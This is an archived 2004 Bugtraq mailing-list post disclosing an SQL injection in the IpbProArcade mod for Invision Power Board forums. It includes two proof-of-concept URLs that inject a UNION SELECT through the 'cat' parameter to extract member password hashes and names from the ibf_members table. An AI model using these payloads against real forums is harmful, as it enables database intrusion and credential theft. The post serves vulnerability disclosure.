lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20041120200553.4085.qmail@www.securityfocus.com> Date: 20 Nov 2004 20:05:53 -0000 From: axl daivy <axlownz@...il.com> To: bugtraq@...urityfocus.com Subject: IpbProArace 2.5.x SQL injection. i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x) the vuln exists in the "category" field. buy using this field it is possible to inject any sql query and compemise the entire forum system p.o.c for ipb 1.x http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* for ipb 2.x index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* discovered by Axl credit goes to HLL for Helping me write the actual exploit greetz to CereBrums And JonJon cheers Axl
Powered by blists - more mailing lists